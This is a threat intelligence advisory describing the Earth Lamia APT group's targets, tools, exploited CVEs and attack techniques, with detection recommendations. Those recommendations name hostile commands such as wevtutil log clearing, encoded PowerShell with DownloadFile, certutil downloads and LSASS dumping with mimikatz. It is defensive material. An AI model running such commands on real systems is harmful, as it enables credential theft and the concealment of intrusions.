Earth Lamia Expands Arsenal to Target Multiple Industries in 2025

Published Date: June 4, 2025
Category: ShadowOpsIntel
Share:

Earth Lamia, a China-nexus APT group, has been actively targeting industries in Brazil, India, and Southeast Asia since 2023. The actor has evolved its focus over time – from financial services to logistics, retail, IT, and public institutions – using customized tools and advanced techniques. Its arsenal includes a novel backdoor named PULSEPACK, modified open-source tools, and widespread exploitation of web-facing application vulnerabilities.

Severity Level: High

Threat Details

1. Targeted Regions: Brazil, India, Thailand, Vietnam, Indonesia, Malaysia, Philippines

2. Targeted Industries (by Timeline):

PeriodPrimary Target Industries
2023 – Early 2024Financial Services (Securities, Brokerage)
Mid 2024Logistics, Online Retail
Late 2024 – 2025IT, Education, Government

3. Custom Tools and Malware

  • PULSEPACK (.NET modular backdoor)
    Plugin-based architecture; communicates via TCP (2024) and WebSocket (2025)
    Uses AES encryption, memory injection, and reflective loading
  • BypassBoss: Modified from “Sharp4PrinterNotifyPotato”; used for privilege escalation
  • Cobalt Strike & Brute Ratel: Used with custom loaders and encrypted shellcode
  • VShell Loader: Also uses the open-source tool VOIDMAW for in-memory evasion
  • DLL sideloading: Leveraging legitimate binaries (e.g., AppLaunch.exe) to load malware

4. Exploited Vulnerabilities

Earth Lamia aggressively scans & exploits the following public-facing software to gain initial access:

CVE-IDAffected SoftwareVulnerability Type
CVE-2017-9805Apache Struts2Remote Code Execution (RCE)
CVE-2021-22205GitLabRCE via improper image validation
CVE-2024-9047WordPress PluginArbitrary File Access
CVE-2024-27198/99JetBrains TeamCityAuth Bypass / Path Traversal
CVE-2024-51378/567CyberPanelRCE
CVE-2024-56145Craft CMSRCE
CVE-2025-31324SAP NetWeaver Visual ComposerFile Upload RCE (Unauthenticated)

5. Execution

  • Execution of post-exploitation scripts via certutil.exe / powershell.exe for downloading tools
  • Deploys Custom Backdoor (PULSEPACK)
  • Leverages legitimate binaries (e.g., AppLaunch.exe) to side load malware

6. Persistence

  • Creates new user accounts (e.g., sysadmin123, helpdesk), Schedules Tasks (schtasks.exe) using plugin TKRun.dll from PULSEPACK
  • Maintains persistence through modified dlls, registry modifications, hidden startup mechanisms

7. Privilege Escalation

  • Tools used: GodPotato, JuicyPotato, BypassBoss
  • Local admin rights leveraged to: escalate to system, extract credentials and control domain environments

8. Lateral Movement

  • Uses stolen credentials or dropped tools to move inside the network
  • Techniques: LSASS memory dump to extract hashes, SAM + SYSTEM hive extraction, Network scanning (with Fscan, Kscan), Proxy tunneling with Stowaway, Rakshasa

9. Defense Evasion: Cleaning Windows Application, System and Security event logs with “wevtutil.exe”

Recommendations:

  1. Ensure Apache Struts2, GitLab, WordPress Plugin, JetBrains TeamCity, CyberPanel, Craft CMS, SAP NetWeaver Visual Composer are updated with the latest security patches.
  2. Audit and remove suspicious accounts like sysadmin123 or helpdesk.
  3. Alert on log clearing commands: wevtutil.exe cl System, Security, Application
  4. Disable vulnerable services where possible (e.g., unused IIS, Apache modules).
  5. Detect encoded/in-memory PowerShell usage: powershell.exe -enc, Invoke-Expression, DownloadFile
  6. Detect suspicious command execution like certutil.exe downloading files or cmd.exe /c used by non-interactive users
  7. Detect execution of legitimate binaries (AppLaunch.exe) loading non-standard DLLs (mscoree.dll, etc.) from user-controlled paths
  8. Detect access to lsass.exe via tools like procdump, mimikatz, or suspicious use of taskmgr by non-admin users
  9. Monitor file drops of suspicious DLLs (Voidmaw, encoded shellcode), especially in %Public%, %Temp%, or %AppData% paths
  10. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/c26546383a7a1bd685dad3238123a1b8186c694ee11c07f6fa6daf84cbb9b96b/iocs

Source:

  • https://www.trendmicro.com/en_us/research/25/e/earth-lamia.html

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.